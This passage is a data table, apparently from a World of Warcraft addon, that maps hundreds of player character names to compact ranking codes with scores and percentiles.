["Twoincherect"] = "CB:178/21%CM:220/22%",
["Waytooez"] = "CM:234/23%",
["Slipi"] = "UM:268/27%",
["Dodolook"] = "CB:117/12%RM:612/68%",
["Yuber"] = "EB:567/79%EM:797/84%",
["Krug"] = "SB:812/99%LM:974/98%",
["Shaqnificent"] = "EB:751/94%EM:896/91%",
["Coknut"] = "LB:772/97%LM:949/96%",
["Droltar"] = "EB:745/93%EM:745/79%",
["Roofgodx"] = "LB:736/96%EM:873/92%",
["Zna"] = "EB:724/91%EM:897/92%",
["Beardier"] = "LB:779/97%LM:971/97%",
["Superbig"] = "SB:814/99%SM:1012/99%",
["Stonedform"] = "LB:779/97%EM:894/91%",
["Sleepdeprive"] = "LB:759/95%EM:892/92%",
["Chinz"] = "LB:793/98%SM:1001/99%",
["Warchad"] = "RB:401/66%RM:583/73%",
["Shokzy"] = "UB:39/30%UM:328/34%",
["Jarome"] = "UM:437/47%",
["Vaelastraza"] = "LB:762/96%EM:895/91%",
["Lightkeeper"] = "EB:670/86%EM:813/84%",
["Demõnic"] = "LB:763/96%LM:961/97%",
["Archinfrost"] = "UB:347/45%RM:555/61%",
["Phaylanx"] = "EB:627/79%EM:571/76%",
["Lunaira"] = "LB:776/98%SM:899/99%",
["Nufftop"] = "RB:400/62%EM:805/90%",
["Slof"] = "LB:742/97%LM:901/95%",
["Slofcat"] = "EB:606/80%EM:790/84%",
["Zobo"] = "SB:778/99%SM:1001/99%",
["Timeheels"] = "CT:58/5%CB:155/18%RM:470/51%",
["Bapped"] = "UM:269/27%",
["Popcat"] = "RB:505/66%EM:786/82%",
["Eqrkd"] = "UM:316/33%",
["Rengganis"] = "CM:221/22%",
["Climate"] = "UB:279/36%RM:533/58%",
["Ulita"] = "UM:248/25%",
["Nazguhl"] = "UB:140/28%EM:672/83%",
["Chainshock"] = "CM:172/15%",
["Crystalw"] = "CM:38/2%",
["Fygodi"] = "EB:555/77%EM:759/83%",
["Thrukk"] = "CT:58/19%RB:570/73%EM:927/94%",
["Jiio"] = "LB:717/95%EM:844/93%",
["Ruhfiki"] = "EB:722/94%EM:850/89%",
["Reconciler"] = "RB:469/64%EM:800/86%",
["Superfluous"] = "UM:272/27%",
["Evilderick"] = "CM:224/22%",
["Assbeef"] = "UM:279/28%",
["Heliovision"] = "EB:751/94%EM:895/91%",
["Slimronin"] = "EB:574/76%EM:757/81%",
["Hotami"] = "UM:320/33%",
["Nekrotix"] = "CB:157/19%RM:557/57%",
["Dracoliche"] = "UB:235/31%RM:463/50%",
["Pickysha"] = "CM:109/10%",
["Svengali"] = "UM:428/46%",
["Gwalhyde"] = "LB:763/96%LM:959/96%",
["Tehloot"] = "RM:615/68%",
["Gulzar"] = "RM:228/56%",
["Hitchpriest"] = "RM:315/59%",
["Jortron"] = "UM:267/48%",
["Reapiñ"] = "CM:108/14%",
["Ginro"] = "RB:502/70%EM:809/86%",
["Malizia"] = "RB:528/73%EM:710/78%",
["Sippies"] = "EM:806/86%",
["Shankhill"] = "CM:82/10%",
["Bigdps"] = "EB:744/94%LM:969/97%",
["Memenology"] = "EB:736/93%EM:808/80%",
["Nightshader"] = "LB:724/95%LM:913/95%",
["Toughnuts"] = "LB:779/98%LM:908/95%",
["Divro"] = "EB:753/94%EM:810/84%",
["Shygirl"] = "UB:298/39%EM:760/80%",
["Shyguyy"] = "LB:746/97%LM:964/98%",
["Ceth"] = "RB:532/68%EM:871/90%",
["Hotdogstand"] = "RB:493/68%EM:843/89%",
["Îmhotep"] = "RB:365/51%EM:687/76%",
["Bakstabbeth"] = "CM:71/6%",
["Skrotemtotem"] = "UM:433/47%",
["Anvar"] = "UM:376/38%",
["Krzyeyecow"] = "UB:277/30%EM:751/79%",
["Kandalf"] = "CM:135/12%",
["Coldburn"] = "EM:704/76%",
["Maey"] = "LB:747/97%LM:881/95%",
["Arlaeus"] = "LB:767/96%EM:912/94%",
["Fafy"] = "RM:638/68%",
["Deletemaster"] = "EB:482/80%EM:790/89%",
["Saeroyiahh"] = "RB:375/64%RM:537/59%",
["Scallion"] = "CB:139/16%UM:370/38%",
["Sofakinglulz"] = "UM:384/41%",
["Yanstar"] = "CT:60/6%EB:643/83%EM:785/82%",
["Huanchao"] = "EB:733/92%LM:942/95%",
["Atulolz"] = "UB:307/39%RM:644/71%",
["Grumpymage"] = "EM:705/77%",
["Pikabee"] = "EB:729/92%EM:848/85%",
["Jooce"] = "EB:440/77%RM:252/65%",
["Facehunter"] = "CB:154/16%CM:144/16%",
["Ronchie"] = "UM:124/25%",
["Bigsmash"] = "RB:462/58%RM:321/54%",
["Craw"] = "RB:386/51%EM:864/88%",
["Gratia"] = "RB:453/62%RM:647/71%",
["Sylvanoose"] = "RB:415/56%RM:320/59%",
["Bezebe"] = "EB:597/76%RM:664/71%",
["Ckock"] = "EB:701/93%EM:815/87%",
["Josemartinez"] = "EB:599/76%RM:667/71%",
["Bowkake"] = "RB:400/52%CM:246/23%",
["Nviro"] = "RB:557/71%EM:818/79%",
["Bloodarrowz"] = "EB:583/76%RM:657/70%",
["Tezebe"] = "SB:791/99%LM:961/98%",
["Kettricken"] = "RB:487/63%EM:750/78%",
["Neal"] = "LB:747/95%SM:1025/99%",
["Lonelyandsad"] = "UB:298/39%UM:314/32%",
["Vya"] = "CB:192/23%EM:785/83%",
["Frostyqt"] = "UB:300/40%CM:130/12%",
["Underlegend"] = "EB:697/88%EM:749/79%",
["Mazenb"] = "RB:511/68%RM:624/69%",
["Cucumber"] = "EB:641/83%RM:695/72%",
["Bubblecutie"] = "UB:338/44%UM:368/39%",
["Öwlman"] = "UT:354/47%EB:740/93%EM:763/80%",
["Silverbread"] = "CB:98/10%",
["Bubblelockx"] = "RB:488/64%UM:471/48%",
["Toxiç"] = "EB:633/80%RM:667/71%",
["Velluhan"] = "CB:65/5%UM:286/34%",
["Thinktank"] = "UT:352/46%LB:780/97%EM:820/85%",
["Rawzznaldo"] = "UB:224/28%UM:377/40%",
["Macharian"] = "RB:297/65%RM:357/60%",
["Nomoofoyou"] = "LB:764/97%EM:876/92%",
["Watershock"] = "EB:638/86%EM:864/91%",
["Smackinbars"] = "EB:727/92%EM:862/89%",
["Alitah"] = "RM:676/72%",
["Cowrownah"] = "RB:541/71%RM:577/61%",
["Charmainn"] = "CB:45/3%CM:3/3%",
["Geogeo"] = "CM:215/20%",
["Touchmybelly"] = "CB:34/3%RM:538/59%",
["Jsxiaohuo"] = "CM:74/7%",
["Aaboss"] = "UB:138/28%CM:91/18%",
["Momaek"] = "CB:146/16%CM:240/24%",
["Bravesamuel"] = "EB:711/89%RM:691/74%",
["Alonecode"] = "CM:60/4%",
["Pene"] = "RM:634/70%",
["Stugg"] = "RM:584/62%",
["Erantius"] = "UM:303/31%",
["Skullmaster"] = "UB:239/30%RM:502/51%",
["Iseeyoú"] = "RB:388/50%EM:812/84%",
["Sneakonyou"] = "CM:154/15%",
["Aangaangaang"] = "LB:785/98%EM:887/91%",
["Behrultra"] = "LB:716/96%EM:756/90%",
["Mightguyz"] = "EB:753/94%EM:865/89%",
["Leejieun"] = "EB:747/94%EM:711/77%",
["Njxiaogege"] = "UB:180/35%EM:712/85%",
["Hercuweeze"] = "RB:489/64%EM:787/82%",
["Zoomington"] = "RM:763/73%",
["Spooki"] = "SM:1000/99%",
["Spiríted"] = "UB:317/41%UM:253/25%",
["Tryggvason"] = "EB:729/94%EM:888/94%",
["Pianist"] = "CM:157/15%",
["Thicky"] = "RM:423/66%",
["Peocut"] = "CB:132/16%RM:634/70%",
["Busdriverx"] = "RB:526/67%RM:679/72%",
["Karatecow"] = "RB:494/68%EM:679/75%",
["Mordred"] = "ET:575/76%RB:521/70%RM:645/67%",
["Drogahn"] = "EB:752/94%LM:1001/98%",
["Vesech"] = "CM:59/7%",
["Kirbynag"] = "EB:712/91%LM:927/95%",
["Saeku"] = "CB:172/21%RM:576/63%",
["Nyanyako"] = "CB:215/23%CM:135/15%",
["Mercibeacoup"] = "EB:749/94%EM:928/94%",
["Jan"] = "LB:733/95%LM:925/95%",
["Alladat"] = "EM:791/84%",
["Sixtynined"] = "EB:667/91%EM:865/92%",
["Biziebone"] = "RB:470/60%RM:539/58%",
["Synaris"] = "RB:526/70%EM:715/78%",
["Delktank"] = "UM:164/46%",
["Shadowtin"] = "RM:515/53%",
["Kazina"] = "CM:68/5%",
["Rinkzz"] = "UB:321/42%RM:520/57%",
["Rektget"] = "RB:394/57%EM:690/75%",
["Ioltard"] = "EB:703/89%EM:876/90%",
["Kaigum"] = "EM:734/79%",
["Zugme"] = "CM:227/22%",
["Bokff"] = "EB:646/87%EM:839/92%",
["Gzyone"] = "UB:369/46%UM:444/47%",
["Obesexie"] = "RB:400/51%UM:382/39%",
["Xingxingsky"] = "CM:82/6%",
["Crixuslol"] = "EB:603/78%UM:451/46%",
["Laaoda"] = "CB:162/21%RM:528/54%",
["Titanhecate"] = "RB:530/74%RM:664/73%",
["Kosatl"] = "EB:608/83%EM:897/93%",
["Bababear"] = "CM:191/17%",
["Huaibao"] = "UM:326/32%",
["Bubblebender"] = "CB:190/22%UM:381/40%",
["Edeughanugan"] = "RM:509/55%",
["Lovefrom"] = "UB:370/47%UM:483/49%",
["Evershield"] = "EB:594/82%EM:856/92%",
["Damigu"] = "EB:604/83%EM:874/92%",
["Destosterone"] = "UM:400/40%",
["Miserry"] = "RB:503/66%RM:697/72%",
["Yodka"] = "CM:186/17%",
["Greencheese"] = "EB:708/89%EM:795/83%",
["Zugbox"] = "EB:661/83%RM:484/51%",
["Cownchickin"] = "LB:752/97%LM:920/97%",
["Macaulay"] = "RB:561/73%RM:542/56%",
["Quadzilla"] = "RB:547/70%RM:566/60%",
["Purples"] = "RT:185/62%EB:608/80%EM:451/78%",
["Plägue"] = "EB:701/89%EM:853/88%",
["Remercy"] = "EB:674/92%EM:889/94%",
["Sugmadic"] = "RB:501/63%RM:629/67%",
["Croz"] = "EB:733/92%EM:932/93%",
["Xelin"] = "UM:409/44%",
["Jonno"] = "EB:577/76%LM:927/95%",
["Hiddenfrost"] = "UM:352/37%",
["Svss"] = "EB:654/83%RM:652/70%",
["Tygerlillie"] = "RM:281/60%",
["Ceadius"] = "EB:591/81%EM:810/86%",
["Sinfool"] = "RM:636/70%",
["Slammin"] = "UB:363/43%UM:409/42%",
["Reallystronk"] = "CM:48/4%",
["Kalag"] = "CB:101/9%UM:367/39%",
["Atl"] = "LB:746/97%EM:805/87%",
["Redsnow"] = "RM:590/63%",
["Superxlock"] = "CM:143/14%",
["Tkefni"] = "RM:587/65%",
["Natediggity"] = "CB:85/9%UM:297/30%",
["Eclipse"] = "EB:688/88%EM:922/93%",
["Rickety"] = "EB:680/86%LM:930/95%",
["Grandragon"] = "UM:276/28%",
["Lìllìth"] = "CB:45/3%CM:198/19%",
["Sanchezz"] = "RB:495/63%EM:811/85%",
["Basilea"] = "EB:608/77%EM:932/94%",
["Sapdance"] = "CB:30/2%UM:423/44%",
["Ndasmu"] = "RB:498/66%EM:770/83%",
["Elflima"] = "RB:532/70%RM:622/66%",
["Brutalis"] = "UB:343/40%EM:918/94%",
["Tyríel"] = "EB:749/94%SM:1000/99%",
["Tyga"] = "EB:669/84%EM:852/84%",
["Arpazia"] = "CB:52/4%CM:118/10%",
["Shz"] = "LB:777/97%LM:991/98%",
["Jellydonutz"] = "EB:693/87%EM:710/75%",
["Tfue"] = "RM:458/50%",
["Mcfrosty"] = "CM:244/24%",
["Ohlin"] = "LB:759/96%LM:976/98%",
["Katarstrophe"] = "CM:200/20%",
["Ancientbaby"] = "RB:426/52%RM:559/60%",
["Chronoz"] = "EB:619/87%EM:780/89%",
["Whitecla"] = "CB:60/6%UM:424/43%",
["Ðecimation"] = "UM:317/33%",
["Mattayahu"] = "UM:431/46%",
["Inurendo"] = "CM:70/6%",
["Sheephappen"] = "CB:181/22%RM:643/71%",
["Duckonius"] = "UT:111/49%EB:607/86%EM:578/93%",
["Leadsoup"] = "UB:287/32%CM:220/22%",
["Goombastompa"] = "EB:730/92%EM:915/92%",
["Jacboskum"] = "EB:722/91%EM:792/83%",
["Luckystrike"] = "LB:754/95%EM:919/92%",
["Latar"] = "RB:451/60%EM:852/89%",
["Noobsbane"] = "RM:779/74%",
["Notmyprob"] = "EB:555/84%EM:715/87%",
["Pachamongrel"] = "UB:292/38%UM:421/46%",
["Liferr"] = "UB:133/45%RM:343/61%",
["Taskforce"] = "CB:138/15%UM:283/28%",
["Diontis"] = "CM:76/6%",
["Dougler"] = "EB:626/79%EM:755/80%",
["Hermiône"] = "EB:682/88%EM:844/89%",
["Astranaar"] = "EB:635/91%EM:620/81%",
["Creepycat"] = "UB:305/39%UM:280/28%",
["Yungrichorc"] = "CM:107/14%",
["Zarindiya"] = "CB:171/20%RM:528/58%",
["Millersmash"] = "EB:708/89%EM:882/91%",
["Clunch"] = "CM:27/0%",
["Shikuai"] = "EB:738/94%SM:1028/99%",
["Arg"] = "EB:710/89%EM:932/94%",
["Scottdk"] = "EB:598/76%EM:776/81%",
["Pastatute"] = "EM:689/89%",
["Muckdaddy"] = "CB:45/3%UM:274/28%",
["Thekite"] = "EB:649/84%EM:845/87%",
["Komalo"] = "UB:272/34%UM:330/32%",
["Dumpstadiva"] = "RM:676/72%",
["Bett"] = "UB:239/30%RM:515/56%",
["Vinne"] = "EB:643/84%EM:889/92%",
["Reinbow"] = "CB:200/24%CM:115/10%",
["Magnar"] = "UB:329/37%RM:500/53%",
["Faefnir"] = "RB:444/63%EM:775/84%",
["Archinlock"] = "CB:142/17%UM:464/47%",
["Moonstrika"] = "EB:716/91%EM:825/85%",
["Divinetiny"] = "EB:648/82%EM:852/88%",
["Kittenkicker"] = "RB:517/69%EM:757/81%",
["Snazzymagoo"] = "CM:246/23%",
["Wotz"] = "EB:593/75%EM:708/75%",
["Xensia"] = "EB:621/87%EM:606/78%",
["Barlin"] = "EB:561/78%EM:813/87%",
["Psn"] = "EB:633/82%EM:869/89%",
["Aightbet"] = "EB:576/75%RM:610/63%",
["Zargor"] = "EB:554/79%EM:773/88%",
["Rokkrmaor"] = "RB:442/58%EM:743/80%",
["Wed"] = "EB:617/81%EM:724/78%",
["Grethrou"] = "EB:725/92%EM:910/93%",
["Soonde"] = "UB:388/49%RM:579/62%",
["Stinkytofuu"] = "RB:570/73%RM:507/54%",
["Crazydruid"] = "LB:728/96%EM:537/76%",
["Soiled"] = "UM:402/41%",
["Leadur"] = "UB:368/43%UM:426/44%",
["Gloryz"] = "CM:30/1%",
["Kalesa"] = "CM:214/21%",
["Faneto"] = "RM:607/65%",
["Kayro"] = "EB:576/75%UM:465/48%",
["Immunization"] = "LB:773/98%SM:1004/99%",
["Novanglus"] = "EB:608/84%EM:809/87%",
["Bigtwo"] = "LB:766/96%SM:997/99%",
["Honeymancer"] = "RT:471/63%EB:646/84%CM:194/20%",
["Pandamin"] = "UB:290/37%RM:486/53%",
["Laojiü"] = "RB:502/64%RM:571/61%",
["Daxiangjiao"] = "EB:697/88%EM:787/82%",
["Litreacola"] = "CM:62/7%",
["Liverspots"] = "EB:612/84%EM:781/84%",
["Prioryofsion"] = "RB:493/65%RM:628/69%",
["Delaqua"] = "RB:386/51%RM:461/50%",
["Somber"] = "UB:192/25%CM:148/14%",
["Humbabã"] = "CM:131/13%",
["Brennt"] = "RB:510/68%UM:455/49%",
["Twowoke"] = "RB:438/57%RM:623/66%",
["Whiteclawdad"] = "EB:743/93%LM:931/95%",
["Orwass"] = "RB:419/57%RM:459/50%",
["Skeezbee"] = "RM:529/58%",
["Singularityz"] = "RB:526/73%RM:595/66%",
["Moonwell"] = "RB:417/57%RM:553/71%",
["Kass"] = "EB:623/85%EM:825/88%",
["Soopafreak"] = "UB:182/46%UM:216/25%",
["Kassidee"] = "UB:367/48%EM:838/88%",
["Itztricky"] = "LT:830/96%LB:777/98%SM:1053/99%",
["Crushin"] = "EB:707/89%EM:720/86%",
["Nightbabe"] = "RB:408/55%EM:574/76%",
["Xdlmao"] = "CB:139/16%",
["Redbeen"] = "EB:748/94%EM:711/75%",
["Purplehazeop"] = "RB:539/71%EM:825/85%",
["Zakuassault"] = "RB:469/62%RM:698/74%",
["Hicu"] = "EB:538/77%EM:707/85%",
["Aoinocrow"] = "EB:663/85%EM:818/85%",
["Pettreen"] = "EB:510/77%EM:698/82%",
["Mogawolf"] = "RB:439/61%RM:630/70%",
["Wenhao"] = "RB:531/69%RM:599/62%",
["Raphoof"] = "ET:676/88%LB:747/95%EM:886/94%",
["Bluexx"] = "UT:260/35%RB:495/68%EM:730/80%",
["Perper"] = "EB:674/87%EM:891/92%",
["Lightningz"] = "EB:678/85%EM:853/88%",
["Lionhunting"] = "EB:595/78%EM:803/83%",
["Mercal"] = "EB:624/79%EM:810/84%",
["Auloin"] = "EB:705/90%EM:827/86%",
["Dumbdum"] = "EB:602/78%UM:268/25%",
["Raejinite"] = "RB:465/58%EM:733/77%",
["Jiveturkey"] = "RB:432/71%EM:738/86%",
["Arimel"] = "UB:274/35%UM:339/39%",
["Macharion"] = "EB:648/89%EM:823/91%",
["Luckyboy"] = "EB:568/75%EM:796/85%",
["Optimex"] = "UB:249/32%UM:309/32%",
["Charter"] = "EB:612/84%RM:656/73%",
["Rangakoz"] = "LB:789/98%LM:955/96%",
["Ateroll"] = "EB:697/92%EM:826/88%",
["Meatkleaver"] = "EB:729/91%RM:638/68%",
["Farmersm"] = "SB:856/99%SM:1038/99%",
["Peachbrownie"] = "LT:494/96%LB:781/97%LM:929/95%",
["Mushroomdrip"] = "LB:773/97%LM:988/98%",
["Flamingbird"] = "UM:244/33%",
["Hanseel"] = "RM:295/66%",
["Poka"] = "UM:329/34%",
["Chibimage"] = "CB:175/23%UM:223/28%",
["Bodyguarder"] = "RB:562/72%RM:685/73%",
["Hanghanghang"] = "EB:682/92%LM:922/96%",
["Privet"] = "UM:446/48%",
["Searious"] = "EB:700/89%EM:910/93%",
["Bagelboss"] = "SB:812/99%SM:1027/99%",
["Greenslice"] = "LB:740/96%LM:943/97%",
["Shiddywizard"] = "UB:238/30%RM:534/59%",
["Goodjobb"] = "RB:479/66%EM:800/87%",
["Janduin"] = "UB:354/41%RM:700/74%",
["Shermstick"] = "EM:717/76%",
["Qore"] = "UM:282/28%",
["Govie"] = "LB:789/98%LM:979/98%",
["Uncreated"] = "RM:650/71%",
["Miek"] = "EB:744/94%EM:890/91%",
["Memnoch"] = "RB:411/56%SM:994/99%",
["Smeegul"] = "EB:703/90%EM:876/91%",
["Brusy"] = "LB:712/95%LM:944/97%",
["Mindmelt"] = "LB:770/96%SM:1015/99%",
["Toadin"] = "EB:737/92%LM:927/95%",
["Wayllo"] = "LB:796/98%SM:1086/99%",
["Aelricthemad"] = "EB:622/80%RM:495/51%",
["Thanâtos"] = "RB:502/66%EM:803/83%",
["Cicada"] = "RB:572/74%RM:651/67%",
["Divineterror"] = "RB:454/62%EM:777/82%",
["Georgi"] = "RB:534/71%EM:730/79%",
["Nubugatti"] = "EB:659/86%EM:919/93%",
["Artemis"] = "EB:640/83%EM:902/92%",
["Koalaraeb"] = "EB:676/85%EM:901/92%",
["Stunt"] = "RB:414/50%RM:689/73%",
["Ggangpae"] = "RM:403/66%",
["Babyfarmer"] = "EB:627/82%RM:587/65%",
["Tickmage"] = "CB:168/21%EM:724/78%",
["Roflwar"] = "EB:707/92%EM:865/93%",
["Rekkr"] = "CB:35/4%RM:414/63%",
["Terribleidea"] = "EB:621/80%EM:925/94%",
["Defloration"] = "RB:464/64%RM:659/73%",
["Lotharr"] = "EB:736/94%EM:853/94%",
["Vermisse"] = "CB:40/4%RM:536/57%",
["Sidarian"] = "EM:771/83%",
["Buramii"] = "CM:115/10%",
["Mzungu"] = "LB:762/96%LM:934/95%",
["Duskfall"] = "EM:757/87%",
["Mandrâ"] = "RM:610/67%",
["Príestlord"] = "CM:162/14%",
["Onlyry"] = "UB:326/42%UM:452/49%",
["Iljellyll"] = "RB:528/67%EM:747/79%",
["Jakedtho"] = "UM:123/43%",
["Jelato"] = "CM:103/9%",
["Warmhole"] = "CM:210/21%",
["Boomerx"] = "LB:788/98%LM:944/96%",
["Kaaii"] = "LB:780/98%LM:976/98%",
["Pattyboi"] = "CM:9/13%",
["Thád"] = "CM:198/20%",
["Frostykerb"] = "CM:67/5%",
["Csteezy"] = "UM:205/41%",
["Savagerogue"] = "CM:65/6%",
["Zienamayy"] = "CB:116/14%CM:222/21%",
["Xiaosk"] = "EB:576/79%RM:642/71%",
["Xiushenu"] = "CM:182/17%",
["Senlina"] = "CM:42/3%",
["Fixins"] = "UB:227/29%UM:275/28%",
["Suetonius"] = "RM:374/60%",
["Ardrold"] = "CM:107/13%",
["Sakaiizumi"] = "CM:32/2%",
["Qiquanfu"] = "CM:135/11%",
["Terroblade"] = "UB:324/40%RM:605/65%",
["Krueger"] = "EB:697/88%LM:935/95%",
["Bakerbaker"] = "LT:637/98%LB:640/98%LM:968/98%",
["Andytkrv"] = "EB:721/91%LM:943/95%",
["Divorce"] = "CT:82/15%EB:624/79%EM:915/93%",
["Tyrandys"] = "EM:745/87%",
["Boboblaw"] = "CM:182/17%",
["Prevail"] = "UB:293/38%RM:613/67%",
["Jodahblaster"] = "CB:81/9%UM:327/34%",
["Blahp"] = "CB:203/24%RM:662/73%",
["Thedoodmann"] = "EB:551/77%EM:761/83%",
["Kaltrina"] = "RM:610/65%",
["Vhaerun"] = "EB:637/81%RM:633/68%",
["Fatlad"] = "EB:599/76%EM:732/77%",
["Bibg"] = "SB:832/99%SM:1068/99%",
["Trigeminal"] = "EM:777/81%",
["Stronkside"] = "EB:739/93%LM:964/97%",
["Keftiu"] = "RB:430/59%RM:535/59%",
["Helis"] = "RB:523/73%UM:453/49%",
["Chomee"] = "RM:633/70%",
["Metalica"] = "CM:33/2%",
["Exoden"] = "EM:769/83%",
["Jert"] = "CM:250/24%",
["Kíana"] = "UM:419/43%",
["Yellowfang"] = "UB:334/41%RM:495/53%",
["Dudidudi"] = "RB:318/69%EM:729/87%",
["Bojañglez"] = "UB:318/41%RM:468/51%",
["Shadowhunte"] = "CM:94/8%",
["Aerïel"] = "RB:476/63%EM:812/86%",
["Goodbandaids"] = "UB:212/26%UM:435/47%",
["Jordorna"] = "CM:28/0%",
["Stirfry"] = "RM:574/61%",
["Glow"] = "EB:608/84%EM:879/92%",
["Bisheave"] = "RB:463/61%RM:509/53%",
["Jontheshaman"] = "LB:784/98%LM:947/97%",
["Wckkd"] = "CB:78/9%CM:183/17%",
["Mollyshifts"] = "EB:645/90%EM:836/93%",
["Iegolas"] = "EB:606/79%EM:812/84%",
["Remerciless"] = "UB:369/47%RM:606/63%",
["Feralfawcett"] = "EB:670/93%EM:622/83%",
["Trook"] = "EB:678/85%EM:836/86%",
["Loquesiento"] = "UM:388/39%",
["Ðonovan"] = "UM:426/46%",
["Coldwind"] = "CM:132/12%",
["Youlok"] = "UB:294/38%RM:610/67%",
["Brucelin"] = "UM:278/27%",
["Aygxin"] = "CB:34/3%UM:412/42%",
["Yahmedei"] = "RB:429/59%EM:779/85%",
["Kylecrusoe"] = "EB:714/90%EM:861/88%",
["Lilderick"] = "RM:629/69%",
["Bearoa"] = "RB:440/57%UM:292/28%",
["Minis"] = "CM:233/23%",
["Cooperspell"] = "UB:284/36%UM:446/48%",
["Nozell"] = "EB:732/92%EM:883/90%",
["Keegasm"] = "UM:369/40%",
["Rownid"] = "LB:725/95%LM:926/96%",
["Piimpcwang"] = "CB:99/10%LM:905/96%",
["Baddream"] = "UM:390/40%",
["Woble"] = "UB:307/39%RM:499/51%",
["Meatsheild"] = "CB:95/10%CM:195/20%",
["Atcgodx"] = "LB:754/98%EM:861/92%",
["Yups"] = "EB:570/75%RM:640/68%",
["Korrah"] = "EB:579/76%EM:803/83%",
["Gigachad"] = "CB:167/20%UM:450/47%",
["Borgir"] = "EM:731/77%",
["Vigna"] = "CM:78/5%",
["Spankee"] = "UM:344/36%",
["Hazrd"] = "UB:259/28%RM:475/50%",
["Øcn"] = "CB:177/22%UM:455/49%",
["Bùttercùp"] = "CM:161/16%",
["Daytrade"] = "UB:366/47%RM:476/50%",
["Daelan"] = "RB:456/57%EM:812/85%",
["Allmightt"] = "UM:359/38%",
["Jsheep"] = "RB:502/71%EM:695/80%",
["Heartforge"] = "CT:0/0%CB:87/20%RM:499/70%",
["Alehandross"] = "CM:189/18%",
["Sonova"] = "EB:657/83%EM:799/83%",
["Alard"] = "EM:716/78%",
["Peepeepewpoo"] = "RB:530/70%RM:675/74%",
["Marzana"] = "LB:751/98%EM:825/89%",
["Kintoki"] = "UM:411/43%",
["Chaosreapér"] = "UM:428/43%",
["Dixeuros"] = "UM:301/31%",
["Evilskeleton"] = "RM:383/63%",
["Tayntproddar"] = "CB:39/21%",
["Burice"] = "CM:70/7%",
["Designerdrip"] = "CB:85/8%RM:551/61%",
["Milbert"] = "CB:67/7%UM:348/36%",
["Wimsey"] = "LB:772/97%EM:893/92%",
["Lûx"] = "LB:771/97%LM:922/95%",
["Notshyguyy"] = "UB:201/37%RM:598/64%",
["Muzak"] = "EB:594/76%EM:796/83%",
["Turdfurgesn"] = "UB:305/37%RM:496/53%",
["Shortbutthic"] = "RB:439/60%EM:761/82%",
["Chibico"] = "RB:398/51%UM:457/47%",
["Bowels"] = "EB:716/91%EM:828/86%",
["Azzin"] = "RM:487/50%",
["Pizzer"] = "CM:143/13%",
["Taron"] = "EB:667/85%RM:690/72%",
["Millhouse"] = "UM:455/46%",
["Imjoob"] = "LB:724/95%EM:887/93%",
["Optimistic"] = "CB:145/15%RM:634/70%",
["Brusselsnort"] = "RB:558/74%EM:818/87%",
["Time"] = "UM:324/34%",
["Selven"] = "UM:421/40%",
["Aquaowolf"] = "LB:771/97%LM:945/96%",
["Krunch"] = "EB:689/92%LM:932/96%",
["Iwillsurvive"] = "EB:660/89%EM:716/79%",
["Ihorde"] = "EB:631/80%RM:523/56%",
["Chemiçals"] = "UB:288/37%RM:668/73%",
["Krickz"] = "RM:531/58%",
["Hollaz"] = "CB:185/22%RM:492/53%",
["Chaosbringer"] = "RM:647/69%",
["Yavanna"] = "LB:763/96%EM:923/94%",
["Thedeepstate"] = "RB:490/63%EM:777/81%",
["Zugzugmyguy"] = "RM:567/60%",
["Acerro"] = "RB:567/74%EM:844/87%",
["Nochànce"] = "EM:820/85%",
["Simpledps"] = "CM:107/9%",
["Orbeavice"] = "CM:59/4%",
["Storfomorfo"] = "UM:331/34%",
["Namelesshero"] = "EB:719/90%EM:924/94%",
["Trillville"] = "RB:563/73%RM:691/72%",
["Tolian"] = "SB:786/99%EM:865/91%",
["Tolián"] = "RM:573/63%",
["Rxl"] = "CB:48/3%CM:3/3%",
["Twoone"] = "CM:81/6%",
["Viralz"] = "EB:714/93%EM:867/93%",
["Lockdian"] = "UB:335/42%RM:562/58%",
["Littleshrimp"] = "EB:655/84%EM:918/94%",
["Fozes"] = "CB:113/13%RM:631/67%",
["Narnmalaria"] = "CM:26/0%",
["Shamsoon"] = "RB:462/69%EM:588/77%",
["Lunarfox"] = "EB:662/84%EM:773/81%",
["Dotable"] = "RM:579/60%",
["Soulflow"] = "RB:475/62%UM:413/42%",
["Xzerath"] = "EB:590/78%EM:770/83%",
["Huckk"] = "UM:300/31%",
["Precedent"] = "SB:862/99%SM:1021/99%",
["Easy"] = "EB:582/77%EM:763/82%",
["Itwasluck"] = "CM:60/4%",
["Violentj"] = "RB:509/67%RM:665/71%",
["Lm"] = "UM:293/29%",
["Alexxi"] = "LM:912/95%",
["Sairysdrac"] = "CB:39/2%UM:262/26%",
["Sunflash"] = "RB:408/55%EM:754/82%",
["Alusion"] = "CM:29/1%",
["Brettin"] = "CB:88/11%UM:425/46%",
["Gorogoro"] = "CM:29/1%",
["Voresam"] = "EB:505/78%EM:783/89%",
["Elainee"] = "LB:741/96%LM:950/97%",
["Oldthief"] = "CB:201/24%RM:481/51%",
["Bigmeme"] = "UB:388/46%CM:242/24%",
["Esau"] = "RB:516/68%RM:703/74%",
["Nicebuffs"] = "UM:335/34%",
["Conclex"] = "CB:66/7%EM:832/81%",
["Revla"] = "RM:561/58%",
["Aw"] = "EB:643/84%EM:863/90%",
["Qidian"] = "CB:41/4%UM:395/40%",
["Carlota"] = "CB:71/8%UM:365/36%",
["Itcyeggroll"] = "CB:39/2%RM:542/60%",
["Wudiluoli"] = "CB:53/5%UM:335/35%",
["Qtrlbhealz"] = "EB:704/94%EM:892/93%",
["Sonicblow"] = "LB:757/95%EM:788/82%",
["Syphilís"] = "CB:63/5%RM:585/64%",
["Nengalaska"] = "CM:86/7%",
["Kaylever"] = "UB:342/44%UM:328/34%",
["Acéy"] = "RB:510/71%EM:719/79%",
["Orkan"] = "RM:463/68%",
["Prinia"] = "CB:84/10%UM:438/45%",
["Projectblk"] = "CM:167/24%",
["Basicjeonsa"] = "RB:474/60%EM:855/84%",
["Healsonweelz"] = "EB:652/89%EM:846/91%",
["Thranson"] = "RB:490/62%RM:687/73%",
["Pouf"] = "RB:522/69%RM:660/73%",
["Buttertoastt"] = "UM:268/31%",
["Dumbfuq"] = "CM:150/13%",
["Zugg"] = "UM:290/29%",
["Hallowedone"] = "UM:39/38%",
["Threej"] = "UB:335/43%RM:492/54%",
["Baytaxyz"] = "UB:263/34%UM:389/41%",
["Justlikethat"] = "CB:28/1%UM:382/39%",
["Qbone"] = "EB:727/93%LM:945/96%",
["Stickybuds"] = "CM:85/7%",
["Sourrdiesel"] = "RB:517/66%RM:578/62%",
["Quixotik"] = "EB:694/88%EM:859/88%",
["Freehugzz"] = "UB:287/36%UM:348/35%",
["Elgrim"] = "CB:153/18%CM:219/21%",
["Versadin"] = "CM:56/7%",
["Scurn"] = "EB:606/80%EM:686/75%",
